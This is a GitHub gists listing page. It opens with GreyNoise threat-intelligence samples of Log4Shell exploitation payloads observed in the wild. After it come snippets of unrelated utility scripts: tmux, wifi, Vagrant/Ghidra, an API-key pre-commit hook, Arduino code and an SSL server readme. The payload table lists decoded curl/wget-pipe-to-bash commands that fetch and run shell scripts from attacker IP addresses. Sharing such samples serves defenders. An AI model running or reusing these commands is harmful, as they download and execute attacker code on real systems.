nate nathanqthai

nathanqthai / payload_samples.md
Last active May 2, 2022
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to exploitation of the Log4J vulnerability in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified whether any of these are effective. These examples are not comprehensive coverage of all the payloads GreyNoise has observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The following section includes Log4Shell samples seen in the wild.

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

nathanqthai / base64_payloads.csv
Last active Mar 18, 2022
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
View cve_facets.py
#!/usr/bin/env python3
# vim: set ts=4 sw=4 ts=4 et :
import argparse
import logging
import time
import greynoise
import collections
nathanqthai / dashboard.sh
Created Jul 11, 2019
an example of a tmux workspace setup script
#!/bin/sh
session="dash$$"
# code editor
tmux new-session -d -s $session
tmux send-keys 'vim' Enter
tmux split-window -h -p 40
tmux send-keys 'htop' Enter
nathanqthai / wifi.sh
Created May 22, 2019
connect to wifi
#!/bin/sh
INTERFACE='wlp5s0'
[ "`whoami`" = root ] || exec sudo "$0" "$@"
wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
dhclient -r ${INTERFACE}
dhclient ${INTERFACE}
nathanqthai / mdless.sh
Created May 16, 2019
CLI preview for Markdown editing
# sudo apt install ruby inotify-tools
# gem install mdless
# https://github.com/ttscoff/mdless
# refreshing preview of markdown files
mdlive() {
while true; do
inotifywait -q -e close_write $1;
clear;
nathanqthai / Vagrantfile
Last active May 16, 2019
A Vagrantfile for provisioning a VM with Ghidra and X11 forwarding enabled.
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
# ubuntu 18.04 lts
config.vm.box = "ubuntu/bionic64"
# https://ghidra-sre.org/InstallationGuide.html#Requirements
config.vm.provider "virtualbox" do |v|
v.memory = 4096
nathanqthai / pre-commit.sh
Last active Mar 20, 2019
a git pre-commit hook to check for API keys
#!/bin/sh
# stash before we mess around
STASH_NAME="pre-commit-$(date +%s)"
git stash save -q --keep-index $STASH_NAME
# regexes to find keys
TWILIO_KEY="\bAC[a-z0-9]{32}\b"
TWILIO_SECRET="\b[a-z0-9]{32}\b"
API_REGEXPS=( $TWILIO_KEY $TWILIO_SECRET )
nathanqthai / 38khz_adc.ino
Created Sep 24, 2017
idk im a dumpster fire atm
void setup() {
Serial.begin(115200); // use the serial port
TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
ADCSRA = 0xe5; // set the adc to free running mode
ADMUX = 0x40; // use adc0
DIDR0 = 0x01; // turn off the digital input for adc0
}
void loop() {
byte buf[256];
nathanqthai / readme.txt
Last active Aug 31, 2017
simple tornado server with ssl
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x server.py
./server.py
test server:
openssl s_client -connect localhost:8888